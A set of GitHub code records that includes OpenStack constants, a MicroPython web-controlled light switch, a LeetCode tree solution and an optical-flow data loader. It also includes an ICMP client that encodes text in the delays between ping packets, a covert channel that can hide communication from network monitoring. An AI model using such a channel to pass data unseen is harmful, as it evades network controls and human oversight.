'q-dhcp-notifer'\nLOADBALANCER_PLUGIN = 'q-loadbalancer-plugin'\n\nL3_AGENT = 'l3_agent'\nDHCP_AGENT = 'dhcp_agent'\nLOADBALANCER_AGENT = 'loadbalancer_agent'\n\n\ndef get_topic_name(prefix, table, operation):\n \"\"\"Create a topic name.\n\n The topic name needs to be synced between the agent and the\n plugin. The plugin will send a fanout message to all of the\n listening agents so that the agents in turn can perform their\n updates accordingly.\n\n :param prefix: Common prefix for the plugin/agent message queues.\n :param table: The table in question (NETWORK, SUBNET, PORT).\n :param operation: The operation that invokes notification (CREATE,\n DELETE, UPDATE)\n :returns: The topic name.\n \"\"\"\n return '%s-%s-%s' % (prefix, table, operation)\n","repo_name":"JiYou/openstack","sub_path":"packages/source/quantum/quantum/common/topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":399,"dataset":"github-code","pt":"34"} +{"seq_id":"1911517355","text":"#!/usr/bin/env python\n\nfrom base import Icmp\nfrom transceive import *\nfrom helpers import *\nfrom impact import ImpactPacket\nimport threading\nimport time\nimport sys\n\n\nclass Client(Icmp):\n\n def __init__(this, src, dst):\n Icmp.__init__(this)\n this.src = src\n this.dst = dst\n this.dst = dst\n this.clock = 0.001\n this.word_wait = 0\n this.tx_done = threading.Condition(this.lock)\n this.sent_ack = None\n this.frame_replies = 0\n\n def start(this):\n PacketReceiver(this,ImpactPacket.ICMP.ICMP_ECHOREPLY).start()\n \n for i in xrange(this.measurement_packets):\n #exchange clock drift\n pkt = this.build_icmp(this.src, this.dst, icmp_type=ImpactPacket.ICMP().ICMP_ECHO, \\\n id=random.randint(0,1<<16), seq_num=1, data=this.create_time(now())+'/01234567')\n DelayedSender.send(this.sock, this.dst, pkt, 0)\n time.sleep(0.1)\n \n while True:\n this.send_buffer = raw_input(\"# \")\n this.send_buffer = this.send_buffer+'\\n'\n \n this.start_transmission()\n\n while True:\n this.send_next()\n with this.lock:\n if len(this.recv_buffer) != 0:\n w = this.recv_buffer\n this.recv_buffer = ''\n sys.stdout.write(w)\n if w[-1] == \"\\x00\":\n break\n \n def check_speed_up(this):\n if Icmp.check_speed_up(this) :\n this.clock = max(this.clock*0.9,0.0001)\n debug(\"# clock speedup %s\" % this.clock)\n\n def slow_down(this):\n Icmp.slow_down(this)\n this.clock = min(this.clock*1.1,0.4)\n debug(\"# clock slowdown %s\" % this.clock)\n 
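# back off after a failed word: sleep one (now lengthened) clock period plus the base delay unit; this.delay appears to be in milliseconds\n        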
time.sleep(this.clock+(this.delay/1000.0))\n\n def send_next(this):\n this.check_speed_up()\n\n this.frame_replies = 0\n seq = 1\n this.idn = this.in_idn = random.randint(0,1<<16)\n for b in n_bits(this.send_word, this.ppm_bits, this.transmission_len()):\n if(seq != 1):\n time.sleep(this.clock)\n\n debug(\"%s: sending %s at pos %s\" % (this.idn, b, this.code_nr(seq)))\n pkt = this.build_icmp(this.src, this.dst, icmp_type=ImpactPacket.ICMP().ICMP_ECHO, \\\n id=this.idn, seq_num=seq, data=this.create_time(now())+'/01234567')\n seq += 1\n DelayedSender.send(this.sock, this.dst, pkt, this.delay*b)\n\n with this.lock:\n this.sent_ack = None\n debug(\"finished sending packets, waiting for ack\")\n this.tx_done.wait(timeout=this.delay*this.ppm_bits*5/1000.0)\n\n if this.sent_ack == None :\n this.no_ack_reply()\n\n time.sleep(this.word_wait)\n\n def end_reception(this):\n with this.lock:\n w = this.decode_word(this.recv_word)\n debug(\"raw rcv_word %d\" % this.recv_word)\n this.recv_word = 0\n\n if w != False :\n this.ack(True);\n debug(\"reception correct, sending ack\")\n this.flush(w)\n else :\n if this.in_idn != None :\n this.ack(False);\n debug(\"error receiving packet, parity mismatch, sending nack\")\n this.slow_down()\n\n def ack(this,ok):\n this.sent_ack = ok\n pkt = this.build_icmp(this.src, this.dst, icmp_type=ImpactPacket.ICMP().ICMP_ECHO, \\\n id=this.idn, seq_num=this.seq_nr(this.transmission_len()), \\\n data=this.create_time(now())+'/01234567')\n DelayedSender.send(this.sock, this.dst, pkt, 0 if ok else this.delay)\n\n def no_ack_reply(this):\n with this.lock :\n this.retransmission()\n this.in_idn = None\n\n def receive(this, addr, pkt, ip):\n with this.lock :\n in_time = now()\n\n this.frame_replies += 1\n\n #the ack\n if this.frame_replies == this.transmission_len()+1 :\n off = (0 if this.sent_ack else this.delay)\n if this.decode(pkt, in_time, clock_offset=off, ack=True) :\n debug(\"got ack reply\")\n this.transmission_succ()\n else :\n debug(\"got nack reply\")\n this.retransmission()\n\n this.in_idn = None\n this.tx_done.notify()\n\n else :\n if this.in_idn != pkt.get_icmp_id():\n debug(\"got ack from server, but was too late..\")\n this.frame_replies -= 1\n return\n\n code = ppm_code(this.send_word, this.code_nr(pkt.get_icmp_seq()), this.ppm_bits)\n off = code * this.delay\n \n this.decode(pkt, in_time, clock_offset=off)\n\n #last bit received, sending ack\n if this.frame_replies == this.transmission_len() :\n # make sure we do not change sent_ack before main thread is ready\n # to wait for the ack\n this.end_reception()\n\n def __str__(this):\n return 'client'\n","repo_name":"o-/covert","sub_path":"icmp/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"9272801969","text":"from machine import Pin\nimport socket\n\nimport _thread\nimport time\nimport utime\nimport machine\n#import wifiLightSwitch.uftpd\n\n### quick fix for crash\nf = open('log.log', 'w')\nf.write('')\nf.close()\n\ndef resetSwitch(a):\n logToFile('restarting')\n machine.reset()\n\ndef startResetTimer():\n timer = machine.Timer(0)\n #86400 seconds in a day\n timer.init(period=86400000, mode=machine.Timer.PERIODIC, callback=resetSwitch)\n \ndef logToFile(s):\n old = ''\n try:\n f = open('log.log', 'r')\n old = f.read()\n f.close()\n except Exception as e:\n print('EXCEPTION: log most likely not created yet, attempting to create')\n print(e)\n f = open('log.log', 'w')\n 
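# (editor assumption) reopen the log for writing at function level so the success path of the try above can also write; upstream appears to reopen only inside the except branch\n    f = open('log.log', 'w')\n    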
f.write(old)\n    f.write('\\n')\n    f.write(s)\n    f.close()\n\ndef getLog():\n    l = ''\n    try:\n        f = open('log.log')\n        l = f.read()\n        f.close()\n    except Exception as e:\n        print('Exception getting log: ', e)\n        l = 'no log exists'\n    if l == '':\n        l = 'no log exists'\n    return l\n    \n    \n\ndef clearLog():\n    f = open('log.log', 'w')\n    f.write('')\n    f.close()\n    \ndef logException(e):\n    import sys\n    logToFile(str(sys.print_exception(e)))\n    sys.print_exception(e)\n    \n\nclass Switch:\n    def __init__(self, name, relayPinNumber, switchPinNumber, defaultShutOffTimer=15):\n        self.name = name\n        self.relayPin = Pin(relayPinNumber, Pin.OUT)\n        self.switchPin = Pin(switchPinNumber, Pin.IN, Pin.PULL_DOWN)\n        self.pysicalSwitchState = self.switchPin.value()\n        self.shutOffTimer = machine.Timer(1) \n        self.shutOffTime = defaultShutOffTimer * 60000 #60000 = minute\n        #self.adc = machine.ADC(self.switchPin)\n        print('Switch created!')\n        print('Name: ', name)\n\n    def toggle(self):\n        if self.relayPin.value() == 0:\n            self.relayPin.value(1)\n            self.stopTimer()\n            return self.name + \" OFF: \" + str(self.relayPin.value())\n        else:\n            self.relayPin.value(0)\n            self.stopTimer()\n            self.startTimer()\n            return self.name + \" ON: \" + str(self.relayPin.value())\n    #getState gets the on / off state of the light\n    def getState(self):\n        state = 'ON: ' + str(self.relayPin.value())\n        if self.relayPin.value() == 1:\n            state = 'OFF: ' + str(self.relayPin.value())\n        return state\n\n    #analogGraph reads the ADC value, calculates it to a 3.3v scale and makes a crude bar graph\n    def analogGraph(self):\n        v = int((self.adc.read() / 4095) * 50)\n        x = 0\n        bar = str((v / 50) * 3.3) + ' '\n        while x <= v:\n            x = x + 1\n            bar = bar + 'X'\n        return bar\n    #getTimer gets the current state of the shut off timer\n    def getTimer(self):\n        return self.shutOffTimer\n\n    #startTimer starts the shutOffTimer\n    def startTimer(self):\n        self.shutOffTimer.init(period=self.shutOffTime, mode=machine.Timer.ONE_SHOT, callback=self.turnLightOff)\n    \n    #stopTimer turns the shut off timer off\n    def stopTimer(self):\n        self.shutOffTimer.deinit()\n\n\n    #setTimer sets the shut off timer\n    def setTimer(self, timer):\n        #60000 = minute\n        self.shutOffTime = (60000 * timer)\n        self.stopTimer()\n        self.startTimer()\n        return str(self.shutOffTime)\n    \n    #turnLightOff is used with a timer to make sure the light shuts off\n    def turnLightOff(self, a):\n        print('shut off timer fired')\n        if self.relayPin.value() == 0:\n            print('shutting light off')\n            self.toggle()\n        else:\n            print('the light was off already')\n    \ndef watchPysicalSwitch(s):\n    while True:\n        state = s.switchPin.value() \n        if state != s.pysicalSwitchState:\n            s.pysicalSwitchState = state\n            logToFile('physical state set to: ' + str(state))\n            s.toggle()\n        time.sleep(0.4)\n    \ndef watchPysicalSwitches(switches):\n    logToFile('watching switches:')\n    for s in switches:\n        logToFile(s.name)\n    while True:\n        for s in switches:\n            state = s.switchPin.value()\n            if state != s.pysicalSwitchState:\n                s.pysicalSwitchState = state\n                logToFile('physical state set to: ' + str(state))\n                s.toggle()\n            time.sleep(0.5)\n    \n    \n    time.sleep(0.5)\n\ndef web_page():\n    htmlFile = open(\"wifiLightSwitch/index.html\", \"r\")\n    html = htmlFile.read()\n    htmlFile.close()\n    return html\n\ndef sendHTTP(conn, response):\n    conn.send('HTTP/1.1 200 OK\\n')\n    conn.send('Content-Type: text/html\\n')\n    conn.send('Access-Control-Allow-Origin: *')\n    conn.send('Connection: close\\n\\n')\n    conn.sendall(response)\n    conn.close()\n\ndef run():\n    \n    logToFile('RUN starting')\n    startResetTimer()\n
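    # one hard-wired switch for now: relay on GPIO 13, wall-switch input on GPIO 36 (pin numbers are board-specific)\n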
    switches = []\n    switch = Switch('Storage Room', 13, 36)\n    switches.append(switch)\n    _thread.start_new_thread(watchPysicalSwitch, (switch,))\n    \n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.bind(('', 8080))\n    s.listen(5)\n\n    while True:\n        conn, addr = s.accept()\n        try:\n            response = ''\n            request = str(conn.recv(1024))\n            \n            line1On = request.find('/?line1=on')\n            servLog = request.find('/log')\n            reset = request.find('/resetSwitch')\n            getStateHandler = request.find('/getState')\n            getTimerHandler = request.find('/getTimer')\n            setTimerHandler = request.find('/setTimer')\n            clearLogHandler = request.find('/clearLog')\n            if line1On == 6:\n                response = switch.toggle()\n                logToFile('line 1 toggle received')\n                sendHTTP(conn, response)\n            elif servLog == 6:\n                response = getLog()\n                sendHTTP(conn, response)\n            elif getStateHandler == 6:\n                response = switch.getState()\n                sendHTTP(conn, response)\n            elif reset == 6:\n                logToFile('reset request received')\n                response = 'resetting'\n                sendHTTP(conn, response)\n                resetSwitch(1)\n            elif getTimerHandler == 6:\n                logToFile('getting timer: ')\n                response = switch.getTimer()\n                logToFile(response)\n                sendHTTP(conn, response)\n            elif setTimerHandler == 6:\n                logToFile('setting timer: ')\n                response = switch.setTimer(int(request[setTimerHandler+9:request.find(' HTTP')]))\n                logToFile(response)\n                sendHTTP(conn, response)\n            elif clearLogHandler == 6:\n                clearLog()\n                sendHTTP(conn, 'log cleared')\n            else:\n                response = web_page()\n                sendHTTP(conn, response)\n            \n        except Exception as e:\n            logException(e)\n            conn.close()\n        \n    \n    \n","repo_name":"OperationAzura/wifiLightSwitch","sub_path":"wifiLightSwitch/wifiLightSwitchMain.py","file_name":"wifiLightSwitchMain.py","file_ext":"py","file_size_in_byte":7037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26585225063","text":"# 107 - https://leetcode.com/problems/binary-tree-level-order-traversal-ii/\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\nclass Solution:\n    def levelOrderBottom(self, root: TreeNode) -> List[List[int]]:\n        if root is None:\n            return\n        \n        queue = [root]\n        result = []\n        \n        while queue:\n            len_q = len(queue)\n            list_level = []\n            while len_q > 0:\n                curr = queue.pop(0)\n                len_q -= 1\n                list_level.append(curr.val)\n                if curr.left:\n                    queue.append(curr.left)\n                if curr.right:\n                    queue.append(curr.right)\n            result.append(list_level)\n        \n        return result[-1::-1]\n\n'''\nspace complexity --> O(1) extra --> the output array exists in any solution, and the per-level list and the queue never grow to n elements, staying comparatively small.\n -- counting the output and the queue it is O(n+k), where n is the number of nodes and k is the maximum size of the queue.\ntime complexity --> O(n) --> the outer while loop drives the traversal; the inner while loop runs only 'k' times, where 'k' is the maximum number of nodes at any given level.\n''' \n","repo_name":"neeraj-somani/Python_Algos","sub_path":"Leetcode-Problems/62-107-BinaryTreeLevelOrderTraversal-II.py","file_name":"62-107-BinaryTreeLevelOrderTraversal-II.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21365237025","text":"import numpy as np\nimport torch\nimport torch.utils.data as data\nimport torch.nn.functional as F\n\nimport os\nimport math\nimport random\nfrom 
glob import glob\nimport os.path as osp\n\nfrom utils import frame_utils\nfrom utils.augmentor import FlowAugmentor, SparseFlowAugmentor\nfrom utils import flow_transforms\n\nfrom torchvision.utils import save_image\n\nfrom utils import flow_viz\nimport cv2\nfrom utils.utils import coords_grid, bilinear_sampler\n\nclass FlowDataset(data.Dataset):\n    def __init__(self, aug_params=None, sparse=False):\n        self.augmentor = None\n        self.sparse = sparse\n\n        if aug_params is not None:\n            if sparse:\n                self.augmentor = SparseFlowAugmentor(**aug_params)\n            else:\n                self.augmentor = FlowAugmentor(**aug_params)\n\n        self.is_test = False\n        self.init_seed = False\n        self.flow_list = []\n        self.image_list = []\n        self.extra_info = []\n\n    def __getitem__(self, index):\n        #print(self.flow_list[index])\n        if self.is_test:\n            img1 = frame_utils.read_gen(self.image_list[index][0], test=self.is_test)\n            img2 = frame_utils.read_gen(self.image_list[index][1], test=self.is_test)\n            img1 = np.array(img1).astype(np.uint8)[..., :3]\n            img2 = np.array(img2).astype(np.uint8)[..., :3]\n            img1 = torch.from_numpy(img1).permute(2, 0, 1).float()\n            img2 = torch.from_numpy(img2).permute(2, 0, 1).float()\n            return img1, img2, self.extra_info[index]\n\n        if not self.init_seed:\n            worker_info = torch.utils.data.get_worker_info()\n            if worker_info is not None:\n                torch.manual_seed(worker_info.id)\n                np.random.seed(worker_info.id)\n                random.seed(worker_info.id)\n                self.init_seed = True\n\n        index = index % len(self.image_list)\n        valid = None\n        if self.sparse:\n            flow, valid = frame_utils.readFlowKITTI(self.flow_list[index])\n        else:\n            flow = frame_utils.read_gen(self.flow_list[index])\n\n        img1 = frame_utils.read_gen(self.image_list[index][0])\n        img2 = frame_utils.read_gen(self.image_list[index][1])\n        \n        flow = np.array(flow).astype(np.float32)\n        img1 = np.array(img1).astype(np.uint8)\n        img2 = np.array(img2).astype(np.uint8)\n        # grayscale images\n        if len(img1.shape) == 2:\n            img1 = np.tile(img1[...,None], (1, 1, 3))\n            img2 = np.tile(img2[...,None], (1, 1, 3))\n        else:\n            img1 = img1[..., :3]\n            img2 = img2[..., :3]\n\n        if self.augmentor is not None:\n            if self.sparse:\n                img1, img2, flow, valid = self.augmentor(img1, img2, flow, valid)\n            else:\n                img1, img2, flow = self.augmentor(img1, img2, flow)\n\n        img1 = torch.from_numpy(img1).permute(2, 0, 1).float()\n        img2 = torch.from_numpy(img2).permute(2, 0, 1).float()\n        flow = torch.from_numpy(flow).permute(2, 0, 1).float()\n\n        if valid is not None:\n            valid = torch.from_numpy(valid)\n        else:\n            valid = (flow[0].abs() < 1000) & (flow[1].abs() < 1000)\n        return img1, img2, flow, valid.float()\n\n\n    def __rmul__(self, v):\n        self.flow_list = v * self.flow_list\n        self.image_list = v * self.image_list\n        return self\n    \n    def __len__(self):\n        return len(self.image_list)\n\nclass MpiSintel_submission(FlowDataset):\n    def __init__(self, aug_params=None, split='test', root='datasets/Sintel', dstype='clean'):\n        super(MpiSintel_submission, self).__init__(aug_params)\n        flow_root = osp.join(root, split, 'flow')\n        image_root = osp.join(root, split, dstype)\n\n        if split == 'test':\n            self.is_test = True\n\n        for scene in os.listdir(image_root):\n            image_list = sorted(glob(osp.join(image_root, scene, '*.png')))\n            for i in range(len(image_list)-1):\n                self.image_list += [ [image_list[i], image_list[i+1]] ]\n                self.extra_info += [ (scene, i) ] # scene and frame_id\n\n            if split != 'test':\n                self.flow_list += sorted(glob(osp.join(flow_root, scene, '*.flo')))\n\nclass MpiSintel(FlowDataset):\n    def __init__(self, aug_params=None, split='training', 
root='datasets/Sintel', dstype='clean'):\n super(MpiSintel, self).__init__(aug_params)\n\n root = 's3://'\n\n self.image_list = []\n with open(\"./flow_dataset/Sintel/Sintel_\"+dstype+\"_png.txt\") as f:\n images = f.readlines()\n for img1, img2 in zip(images[0::2], images[1::2]):\n self.image_list.append([root+img1.strip(), root+img2.strip()])\n \n self.flow_list = []\n with open(\"./flow_dataset/Sintel/Sintel_\"+dstype+\"_flo.txt\") as f:\n flows = f.readlines()\n for flow in flows:\n self.flow_list.append(root+flow.strip())\n \n assert (len(self.image_list) == len(self.flow_list))\n\n self.extra_info = []\n with open(\"./flow_dataset/Sintel/Sintel_\"+dstype+\"_extra_info.txt\") as f:\n info = f.readlines()\n for scene, id in zip(info[0::2], info[1::2]):\n self.extra_info.append((scene.strip(), int(id.strip())))\n # flow_root = osp.join(root, split, 'flow')\n # image_root = osp.join(root, split, dstype)\n\n # if split == 'test':\n # self.is_test = True\n\n # for scene in os.listdir(image_root):\n # image_list = sorted(glob(osp.join(image_root, scene, '*.png')))\n # for i in range(len(image_list)-1):\n # self.image_list += [ [image_list[i], image_list[i+1]] ]\n # self.extra_info += [ (scene, i) ] # scene and frame_id\n\n # if split != 'test':\n # self.flow_list += sorted(glob(osp.join(flow_root, scene, '*.flo')))\n\n\nclass FlyingChairs(FlowDataset):\n def __init__(self, aug_params=None, split='train', root='datasets/FlyingChairs_release/data'):\n super(FlyingChairs, self).__init__(aug_params)\n\n root = 's3://'\n\n with open(\"./flow_dataset/flying_chairs/flyingchairs_ppm.txt\") as f:\n images = f.readlines()\n images = [root+img.strip() for img in images]\n with open(\"./flow_dataset/flying_chairs/flyingchairs_flo.txt\") as f:\n flows = f.readlines()\n flows = [root+flo.strip() for flo in flows]\n \n # images = sorted(glob(osp.join(root, '*.ppm')))\n # flows = sorted(glob(osp.join(root, '*.flo')))\n assert (len(images)//2 == len(flows))\n\n split_list = np.loadtxt('chairs_split.txt', dtype=np.int32)\n for i in range(len(flows)):\n xid = split_list[i]\n if (split=='training' and xid==1) or (split=='validation' and xid==2):\n self.flow_list += [ flows[i] ]\n self.image_list += [ [images[2*i], images[2*i+1]] ]\n\n\nclass FlyingThings3D(FlowDataset):\n def __init__(self, aug_params=None, root='datasets/FlyingThings3D', dstype='frames_cleanpass'):\n super(FlyingThings3D, self).__init__(aug_params)\n\n root = 's3://'\n\n self.image_list = []\n with open(\"./flow_dataset/flying_things/flyingthings_\"+dstype+\"_png.txt\") as f:\n images = f.readlines()\n for img1, img2 in zip(images[0::2], images[1::2]):\n self.image_list.append([root+img1.strip(), root+img2.strip()])\n self.flow_list = []\n with open(\"./flow_dataset/flying_things/flyingthings_\"+dstype+\"_pfm.txt\") as f:\n flows = f.readlines()\n for flow in flows:\n self.flow_list.append(root+flow.strip())\n\n # for cam in ['left']:\n # for direction in ['into_future', 'into_past']:\n # image_dirs = sorted(glob(osp.join(root, dstype, 'TRAIN/*/*')))\n # image_dirs = sorted([osp.join(f, cam) for f in image_dirs])\n\n # flow_dirs = sorted(glob(osp.join(root, 'optical_flow/TRAIN/*/*')))\n # flow_dirs = sorted([osp.join(f, direction, cam) for f in flow_dirs])\n\n # for idir, fdir in zip(image_dirs, flow_dirs):\n # images = sorted(glob(osp.join(idir, '*.png')) )\n # flows = sorted(glob(osp.join(fdir, '*.pfm')) )\n # for i in range(len(flows)-1):\n # if direction == 'into_future':\n # self.image_list += [ [images[i], images[i+1]] ]\n # 
self.flow_list += [ flows[i] ]\n # elif direction == 'into_past':\n # self.image_list += [ [images[i+1], images[i]] ]\n # self.flow_list += [ flows[i+1] ]\n \n\nclass KITTI(FlowDataset):\n def __init__(self, aug_params=None, split='training', root='datasets/KITTI'):\n super(KITTI, self).__init__(aug_params, sparse=True)\n if split == 'testing':\n self.is_test = True\n\n root = 's3://'\n\n self.image_list = []\n with open(\"./flow_dataset/KITTI/KITTI_{}_image.txt\".format(split)) as f:\n images = f.readlines()\n for img1, img2 in zip(images[0::2], images[1::2]):\n self.image_list.append([root+img1.strip(), root+img2.strip()])\n\n self.extra_info = []\n with open(\"./flow_dataset/KITTI/KITTI_{}_extra_info.txt\".format(split)) as f:\n info = f.readlines()\n for id in info:\n self.extra_info.append([id.strip()])\n\n if split == \"training\":\n self.flow_list = []\n with open(\"./flow_dataset/KITTI/KITTI_{}_flow.txt\".format(split)) as f:\n flow = f.readlines()\n for flo in flow:\n self.flow_list.append(root+flo.strip())\n # root = osp.join(root, split)\n # images1 = sorted(glob(osp.join(root, 'image_2/*_10.png')))\n # images2 = sorted(glob(osp.join(root, 'image_2/*_11.png')))\n\n # for img1, img2 in zip(images1, images2):\n # frame_id = img1.split('/')[-1]\n # self.extra_info += [ [frame_id] ]\n # self.image_list += [ [img1, img2] ]\n\n # if split == 'training':\n # self.flow_list = sorted(glob(osp.join(root, 'flow_occ/*_10.png')))\n\nclass AutoFlow(data.Dataset):\n def __init__(self, num_steps, crop_size, log_dir, root='datasets/'):\n super(AutoFlow, self).__init__()\n\n root = 's3://'\n self.image_list = []\n with open(\"./flow_dataset/AutoFlow/AutoFlow_image.txt\") as f:\n images = f.readlines()\n for img1, img2 in zip(images[0::2], images[1::2]):\n self.image_list.append([root+img1.strip(), root+img2.strip()])\n self.flow_list = []\n with open(\"./flow_dataset/AutoFlow/AutoFlow_flow.txt\") as f:\n flows = f.readlines()\n for flow in flows:\n self.flow_list.append(root+flow.strip())\n \n self.crop_size = crop_size\n self.log_dir = log_dir\n self.num_steps = num_steps\n self.scale = 1\n self.order = 1\n self.black = False\n self.noise = 0\n self.is_test = False\n self.init_seed = False\n\n self.iter_counts = 0\n\n def __rmul__(self, v):\n self.flow_list = v * self.flow_list\n self.image_list = v * self.image_list\n return self\n \n def __len__(self):\n return len(self.image_list) * 100\n \n def __getitem__(self, index):\n #print(self.flow_list[index])\n if self.is_test:\n img1 = frame_utils.read_gen(self.image_list[index][0], test=self.is_test)\n img2 = frame_utils.read_gen(self.image_list[index][1], test=self.is_test)\n img1 = np.array(img1).astype(np.uint8)[..., :3]\n img2 = np.array(img2).astype(np.uint8)[..., :3]\n img1 = torch.from_numpy(img1).permute(2, 0, 1).float()\n img2 = torch.from_numpy(img2).permute(2, 0, 1).float()\n return img1, img2, self.extra_info[index]\n\n if not self.init_seed:\n worker_info = torch.utils.data.get_worker_info()\n if worker_info is not None:\n torch.manual_seed(worker_info.id)\n np.random.seed(worker_info.id)\n random.seed(worker_info.id)\n self.init_seed = True\n index = index % len(self.image_list)\n valid = None\n \n flow = frame_utils.read_gen(self.flow_list[index])\n\n img1 = frame_utils.read_gen(self.image_list[index][0])\n img2 = frame_utils.read_gen(self.image_list[index][1])\n \n flow = np.array(flow).astype(np.float32)\n # For PWC-style augmentation, pixel values are in [0, 1]\n img1 = np.array(img1).astype(np.uint8) / 255.0\n img2 = 
np.array(img2).astype(np.uint8) / 255.0\n\n        # grayscale images\n        if len(img1.shape) == 2:\n            img1 = np.tile(img1[...,None], (1, 1, 3))\n            img2 = np.tile(img2[...,None], (1, 1, 3))\n        else:\n            img1 = img1[..., :3]\n            img2 = img2[..., :3]\n        \n        iter_counts = self.iter_counts\n        self.iter_counts = self.iter_counts + 1\n        th, tw = self.crop_size\n        schedule = [0.5, 1., self.num_steps] # initial coeff, final_coeff, half life\n        schedule_coeff = schedule[0] + (schedule[1] - schedule[0]) * \\\n                (2/(1+np.exp(-1.0986*iter_counts/schedule[2])) - 1)\n        \n        co_transform = flow_transforms.Compose([\n            flow_transforms.Scale(self.scale, order=self.order),\n            flow_transforms.SpatialAug([th,tw],scale=[0.4,0.03,0.2],\n                                        rot=[0.4,0.03],\n                                        trans=[0.4,0.03],\n                                        squeeze=[0.3,0.], schedule_coeff=schedule_coeff, order=self.order, black=self.black),\n            flow_transforms.PCAAug(schedule_coeff=schedule_coeff),\n            flow_transforms.ChromaticAug( schedule_coeff=schedule_coeff, noise=self.noise),\n            ])\n        \n        flow = np.concatenate([flow, np.ones((flow.shape[0], flow.shape[1], 1))], axis=-1)\n        augmented, flow_valid = co_transform([img1, img2], flow)\n        flow = flow_valid[:,:,:2]\n        valid = flow_valid[:,:,2:3]\n\n        img1 = augmented[0]\n        img2 = augmented[1]\n        if np.random.binomial(1,0.5):\n            #sx = int(np.random.uniform(25,100))\n            #sy = int(np.random.uniform(25,100))\n            sx = int(np.random.uniform(50,125))\n            sy = int(np.random.uniform(50,125))\n            #sx = int(np.random.uniform(50,150))\n            #sy = int(np.random.uniform(50,150))\n            cx = int(np.random.uniform(sx,img2.shape[0]-sx))\n            cy = int(np.random.uniform(sy,img2.shape[1]-sy))\n            img2[cx-sx:cx+sx,cy-sy:cy+sy] = np.mean(np.mean(img2,0),0)[np.newaxis,np.newaxis]\n\n\n        img1 = torch.from_numpy(img1).permute(2, 0, 1).float()\n        img2 = torch.from_numpy(img2).permute(2, 0, 1).float()\n        flow = torch.from_numpy(flow).permute(2, 0, 1).float()\n        \n\n        if valid is not None:\n            valid = torch.from_numpy(valid).permute(2, 0, 1).float()\n            valid = valid[0]\n        else:\n            valid = (flow[0].abs() < 1000) & (flow[1].abs() < 1000)\n\n        return img1 * 255, img2 * 255, flow, valid.float()\n\n    \n    \n\n\nclass HD1K(FlowDataset):\n    def __init__(self, aug_params=None, root='datasets/HD1k'):\n        super(HD1K, self).__init__(aug_params, sparse=True)\n\n        root = 's3://'\n        self.image_list = []\n        with open(\"./flow_dataset/HD1K/HD1K_image.txt\") as f:\n            images = f.readlines()\n            for img1, img2 in zip(images[0::2], images[1::2]):\n                self.image_list.append([root+img1.strip(), root+img2.strip()])\n        self.flow_list = []\n        with open(\"./flow_dataset/HD1K/HD1K_flow.txt\") as f:\n            flows = f.readlines()\n            for flow in flows:\n                self.flow_list.append(root+flow.strip())\n\n        # seq_ix = 0\n        # while 1:\n        #     flows = sorted(glob(os.path.join(root, 'hd1k_flow_gt', 'flow_occ/%06d_*.png' % seq_ix)))\n        #     images = sorted(glob(os.path.join(root, 'hd1k_input', 'image_2/%06d_*.png' % seq_ix)))\n\n        #     if len(flows) == 0:\n        #         break\n\n        #     for i in range(len(flows)-1):\n        #         self.flow_list += [flows[i]]\n        #         self.image_list += [ [images[i], images[i+1]] ]\n\n        #     seq_ix += 1\n\n\n\ndef fetch_dataloader(args, TRAIN_DS='C+T+K+S+H'):\n    \"\"\" Create the data loader for the corresponding training set \"\"\"\n\n    if args.stage == 'chairs':\n        if hasattr(args.percostformer, 'pwc_aug') and args.percostformer.pwc_aug:\n            aug_params = {'crop_size': args.image_size, 'min_scale': -0.1, 'max_scale': 1.0, 'do_flip': True, 'pwc_aug': True}\n        else:\n            aug_params = {'crop_size': args.image_size, 'min_scale': -0.1, 'max_scale': 1.0, 'do_flip': True}\n        train_dataset = FlyingChairs(aug_params, 
split='training')\n \n elif args.stage == 'things':\n aug_params = {'crop_size': args.image_size, 'min_scale': -0.4, 'max_scale': 0.8, 'do_flip': True}\n clean_dataset = FlyingThings3D(aug_params, dstype='frames_cleanpass')\n final_dataset = FlyingThings3D(aug_params, dstype='frames_finalpass')\n train_dataset = clean_dataset + final_dataset\n\n elif args.stage == 'sintel':\n aug_params = {'crop_size': args.image_size, 'min_scale': -0.2, 'max_scale': 0.6, 'do_flip': True}\n things = FlyingThings3D(aug_params, dstype='frames_cleanpass')\n sintel_clean = MpiSintel(aug_params, split='training', dstype='clean')\n sintel_final = MpiSintel(aug_params, split='training', dstype='final') \n\n if TRAIN_DS == 'C+T+K+S+H':\n kitti = KITTI({'crop_size': args.image_size, 'min_scale': -0.3, 'max_scale': 0.5, 'do_flip': True})\n hd1k = HD1K({'crop_size': args.image_size, 'min_scale': -0.5, 'max_scale': 0.2, 'do_flip': True})\n train_dataset = 100*sintel_clean + 100*sintel_final + 200*kitti + 5*hd1k + things\n\n elif TRAIN_DS == 'C+T+K/S':\n train_dataset = 100*sintel_clean + 100*sintel_final + things\n\n elif args.stage == 'kitti':\n aug_params = {'crop_size': args.image_size, 'min_scale': -0.2, 'max_scale': 0.4, 'do_flip': False}\n train_dataset = KITTI(aug_params, split='training')\n\n elif args.stage == 'autoflow-pwcaug':\n aug_params = {'num_steps': args.trainer.num_steps, 'crop_size': args.image_size, 'log_dir': args.log_dir}\n train_dataset = AutoFlow(**aug_params)\n\n train_loader = data.DataLoader(train_dataset, batch_size=args.batch_size, \n pin_memory=False, shuffle=True, num_workers=args.batch_size, drop_last=True)\n\n print('Training with %d image pairs' % len(train_dataset))\n return train_loader\n\nif __name__ == \"__main__\":\n aug_params = {'crop_size': [400, 720], 'min_scale': -0.2, 'max_scale': 0, 'do_flip': True}\n aug_params['min_scale'] = -0.2\n aug_params['min_stretch'] = -0.2\n sintel_clean = MpiSintel(aug_params, split='training', dstype='clean')\n\n train_loader = data.DataLoader(sintel_clean, batch_size=1, \n pin_memory=False, shuffle=True, num_workers=1, drop_last=True)\n\n for i_batch, data_blob in enumerate(train_loader):\n image1, image2, flow, valid = [x for x in data_blob]\n print(i_batch, image1.shape)\n \n\n \n\n # if i_batch==5:\n # exit()\n \n 